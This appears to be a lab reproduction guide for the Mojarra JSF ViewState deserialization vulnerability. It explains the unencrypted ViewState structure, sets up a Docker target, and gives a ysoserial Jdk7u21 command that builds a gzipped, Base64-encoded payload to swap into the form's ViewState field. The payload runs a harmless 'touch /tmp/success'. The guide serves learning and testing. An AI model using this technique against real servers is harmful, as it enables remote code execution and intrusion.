Mojarra JSF ViewState Deserialization Vulnerability
Vulnerability details
JavaServer Faces (JSF) is a standard for building web applications, and Mojarra is an implementation of JSF. Before versions 2.1.29-08 and 2.0.11-04, Mojarra did not encrypt the JSF ViewState, so a client-side ViewState is only a Base64-encoded, gzip-compressed serialized Java object that the server deserializes on every form submission. An attacker can therefore replace it with a malicious serialized object and attack the server. Two conditions apply: the application must save view state on the client (`javax.faces.STATE_SAVING_METHOD` set to `client`; with server-side saving the field only carries a lookup key), and a usable gadget chain must be on the classpath, which in the environment below is provided by JDK 7u21 itself.
Environment setup
Target: 192.168.4.10_ubuntu
Run the following command to start a JSF application that uses JDK7u21 and Mojarra 2.1.28:
```
docker-compose up -d
```
Once the environment is up, open `http://your-ip:8080` to see the demo page.
Vulnerability reproduction
The structure of a JSF ViewState is as follows: the serialized Java object, gzip-compressed, then Base64-encoded.
Based on this structure, we use ysoserial's Jdk7u21 gadget chain to generate a valid payload:
```
$java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0
```
Then submit the form, intercept the request, and replace the value of the `javax.faces.ViewState` field with the payload above (remember to URL-encode it: Base64 output contains `+`, `/` and `=`, which a form body would otherwise mangle):
`touch /tmp/success` was executed successfully, which you can confirm by listing `/tmp` inside the application container: